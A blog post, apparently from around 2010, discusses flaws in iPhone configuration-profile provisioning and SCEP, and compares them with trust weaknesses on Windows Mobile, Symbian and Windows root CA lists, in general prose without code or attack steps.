I’m not the only one taking a look at provisioning the iPhone. My focus was to show it working though, and not a complete analysis of the low-level details. Good thing someone else did then 🙂
Heading over to http://cryptopath.wordpress.com/2010/01/29/iphone-certificate-flaws/ you can see that there are a few things that aren’t perfect with how Apple implemented settings provisioning. The reason I’m mentioning it here is that not only did I find the article quite interesting, but I also took my time commenting the article, and thought I’d maybe elaborate some points further here.
Apple has not implemented provisioning and SCEP in a proper way – we can probably agree upon that right off the bat. I have not tested all the variations of signed/unsigned/verified/unverified/etc. When I tested provisioning a signed profile, from an unverified source (I signed with a certificate from my own CA, which is not in the trusted store), the profile did not install without also doing a SCEP enrollment to the CA. (So if you had malicious intent you’d also have to setup a CA.) The behavior might be slightly different with a trusted signer. But the attack itself with signing up for trial Verisign certificates has the classic elements of social engineering as the working element nonetheless. If your users blindly accept provisioning profiles you have a problem regardless of how/when Apple fixes their implementation.
While part of me wants to add this to the list “Why iPhones should not be used in the enterprise” that still does not satisfy all the customers/end-users/businesses screaming that they want to use the iPhone. I’m afraid it’s not a big enough showstopper to bring that to a halt. My recommendation would be to still evaluate using iPhones like the flaw didn’t exist. (Yes, you still have to consider the flaw, but it doesn’t detract from the functionality side of things.) You might still reject the iPhones based on other considerations, but that’s another discussion entirely.
The trust issue exists on other platforms too though. If I wanted to compromise a Windows Mobile I could send out an OMA CP message bootstrapping an OMA DM server, and if I put the name of the mobile operator in the “From” field I’m pretty sure I could fool a user or two into messing up their devices that way. Actually this would apply to other OMA DM devices too for that matter, not only Windows Mobile devices.
Symbian had an issue last year, (or was it the year before – I forget), where a malware publisher managed to get their application signed with a trusted root certificate. While I didn’t read a follow-up story detailing a major outbreak of the malware it certainly had potential to wreak havoc.
I don’t remember if it was on Windows XP, or Windows Vista, but in one of the yearly root CA updates Microsoft removed a bunch of CAs as it was way more than what would qualify as a handpicked list of especially trusted certificate authorities. So managing trust isn’t just a challenge in mobility.
I guess what I’m saying is that it’s “just yet another security flaw”. We see these every week on the desktop. We have procedures for handling them. The mobile devices are no different 🙂
And as much as I disapprove of some of Apple’s choices regarding functionality, vendor lock-in, etc they are doing the right thing by implementing provisioning for upping enterprise adoption rate. Let’s hope it’s a work in progress and that it does not stop here.